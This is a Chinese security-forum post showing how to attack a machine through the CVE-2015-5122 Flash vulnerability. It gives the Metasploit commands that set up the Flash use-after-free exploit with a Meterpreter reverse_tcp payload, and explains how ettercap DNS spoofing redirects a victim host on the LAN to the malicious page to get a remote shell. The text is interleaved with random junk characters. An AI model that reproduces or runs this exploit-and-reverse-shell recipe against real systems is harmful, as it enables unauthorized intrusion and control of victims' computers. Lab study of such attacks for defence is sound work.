找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1894|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ H5 v+ N9 v0 r& l 二、cve2015-5122漏洞实例演示虚拟机 . O: _. C# P; V# E2 g

4 a2 a9 d; M f0 g _0 G+ l/ V$ h6 Q- `

% [; F$ Z9 D7 L# W6 e   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 7 k+ _# B2 x$ T

7 W2 Y/ g" B/ X

* u% W# _0 U9 u) l search cve-2015-5122如图: ! r* ~3 a& y' l7 t

% b. b( [) n2 `" f7 x- t

- T! `' P! d. o) u) e$ u- T   9 ~4 t1 |9 `) U. T5 a! n

% @! Q$ ]0 w1 @3 u, r- |3 |

+ W4 r, g) Z G 下面我们敲如下命令: 5 ^. Y: @/ F# ?

6 }1 [; L& q# P: ^! M( k

8 X7 g) e* R ` use exploit/multi/browser/adobe_flash_opaque_background_uaf % ]3 H4 W M% l

0 h% o! v; l" I# K0 z# }" s& Y- Z' B

. p! d6 F! a0 m set PAYLOAD windows/meterpreter/reverse_tcp 9 Q( H/ G: D: @ a( i& e

6 G; L6 R1 l, ~5 i( b

0 m6 q$ L% N2 h" O" X: s6 j2 f4 k set LHOST 192.168.0.109 1 Q7 A( j/ p+ x) G( _/ ` c

( q$ |4 ]+ S1 [) r2 d

% Z" V% o9 O2 q1 c set URIPATH /                        /*根目录*/ , J7 \" w/ ^+ X/ F

& n% B# ^ X' q* ]

! o8 {# F- o8 O( X9 O set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 - R/ Z$ k% Z1 Y

. k5 l$ t2 [4 h0 t6 K* P

4 e$ i3 q( D' ~) D3 g set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 . `' O" ~+ K& S( ^

: q; n E4 U0 O& I

: z$ b( p8 Z5 ]5 G' N+ s6 [7 ?# R 然后show options如图: ' I# `7 ~$ ]( J9 `$ j

/ _, s/ S/ |% T" h

) H$ r7 i s0 V4 _   7 n! Q# { S. o; H; Q

6 ^; @: g y% F, t

% J* |8 F- Q# G 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
2 R v0 S: L ~# K; J& j; ^0 B9 y
+ {) L% T a( |3 c0 ~! [

1 K5 a( B5 E" s7 ]3 z

; ?; \- X+ @9 t6 @" p 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 ; H1 B* u2 m7 O+ s9 w! b+ k" U

/ i7 l# T' V" J& E! [0 ^

: x% Q0 C b, h2 s2 _ Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ( u3 C2 T! M' X8 ]

3 S, k, x! T, G; A$ ^" ~

9 s ^1 ^# o( j" E; H1 j   # W& W/ J( }: \/ ?- s

# M3 K. v- O; ?9 `8 A

0 y$ g- {; h# S% @& q9 o 成功了,这时候我们断开ettercap,如图: 6 A( m3 y3 X5 P. |

1 Q: F6 N5 N7 r! h1 y

; r: q7 w t1 ]" D6 [7 t) A   * g" d; L# Y: h! g3 h$ p

1 s9 c, c& x( y$ H* }

7 S# p/ b0 f% N0 q7 ?0 c Screenshot如图: 4 D/ L5 w9 {- X. k, T

- [9 n) f0 [0 r ?4 ~2 M# P

6 ?6 P; ?& @' r, a) I8 \* T3 m- m' e   $ u. ]" C+ T6 b6 p# V4 Z

) l9 x7 j( l1 B8 B+ |3 H" F* W* o

( }4 \ M, h6 q: C) p& g1 ? }9 ^ ) n+ v5 R; t; o; c" ]# V

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表